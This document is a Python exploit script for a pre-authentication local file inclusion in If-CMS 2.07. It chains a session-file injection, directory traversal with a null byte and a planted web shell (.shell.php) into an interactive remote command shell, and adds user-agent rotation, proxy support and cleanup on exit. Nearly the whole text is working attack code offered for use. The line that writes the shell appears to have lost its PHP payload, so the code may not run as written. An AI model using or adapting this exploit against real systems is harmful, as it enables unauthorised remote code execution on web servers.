#!/usr/bin/python # ~INFORMATION # Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit # Author: TecR0c # Date: 13/3/2011 # Software link: http://bit.ly/hh9ZB4 # Tested on: Linux bt # Version: 2.07 # PHP.ini Settings: gpc_magic_quotes = Off import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass from optparse import OptionParser from urlparse import urlparse,urljoin from urllib import urlopen from cookielib import CookieJar __CONTACT__ ="TecR0c(tecr0c@tecninja.net)" __DATE__ ="13.3.2011" usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__ parser = OptionParser(usage=usage) parser.add_option("-p","--proxy", type="string",action="store", dest="proxy", help="HTTP Proxy :") (options, args) = parser.parse_args() if options.proxy: print '[+] Using Proxy'+options.proxy # User Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ", "Google Chrome 0.2.149.29 (Windows XP)", "Opera 9.25 (Windows Vista)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Opera/8.00 (Windows NT 5.1; U; en)"] agent = random.choice(agents) traversal = '../../../../../../../../../../../..' sessionLocation = '/var/lib/php5/' def banner(): if os.name == "posix": os.system("clear") else: os.system("cls") header = ''' |----------------------------------------| |Exploit: If-CMS 2.07 LFI RCE |Author: %s |Date: %s |----------------------------------------|\n '''%(__CONTACT__,__DATE__) for i in header: print "\b%s"%i, sys.stdout.flush() time.sleep(0.005) def injectPayload(): webSiteUrl = url.geturl()+'index.php?newlang=' try: opener.open(webSiteUrl) except: print '[-] Failed' def proxyCheck(): if options.proxy: try: h2 = httplib.HTTPConnection(options.proxy) h2.connect() print "[+] Using Proxy Server:",options.proxy except(socket.timeout): print "[-] Proxy Timed Out\n" pass sys.exit(1) except(NameError): print "[-] Proxy Not Given\n" pass sys.exit(1) except: print "[-] Proxy Failed\n" pass sys.exit(1) def getProxy(): try: proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout): print "\n[-] Proxy Timed Out" sys.exit(1) return proxy_handler cj = CookieJar() if options.proxy: opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj)) else: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [('User-agent', agent)] def postRequestWebShell(encodedCommand): webSiteUrl = url.geturl()+'.shell.php' commandToExecute = [ ('cmd',encodedCommand)] cmdData = urllib.urlencode(commandToExecute) try: response = opener.open(webSiteUrl, cmdData).read() except: print '[-] Failed' sys.exit() return response def writeOutShell(encodedCommand): cookieString = str(cj) cookieSearch = re.compile(r"PHPSESSID=(.*) f") session_value = cookieSearch.search(cookieString) if session_value: session_value = session_value.group(1) cj.clear() webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00' try: opener.open(webSiteUrl) except: print '[-] Failed' sys.exit() def commandLine(): encodedCommand = "echo '' > .shell.php" encodedCommand = base64.b64encode(encodedCommand) writeOutShell(encodedCommand) commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc) while True: try: command = raw_input(commandLine) encodedCommand = base64.b64encode(command) response = postRequestWebShell(encodedCommand) print response except KeyboardInterrupt: encodedCommand = base64.b64encode('rm .shell.php') postRequestWebShell(encodedCommand) print "\n[!] Removed .shell.php\n" sys.exit() if "__main__" == __name__: banner() try: url=urlparse(args[0]) except: parser.print_help() sys.exit() getProxy() proxyCheck() injectPayload() commandLine()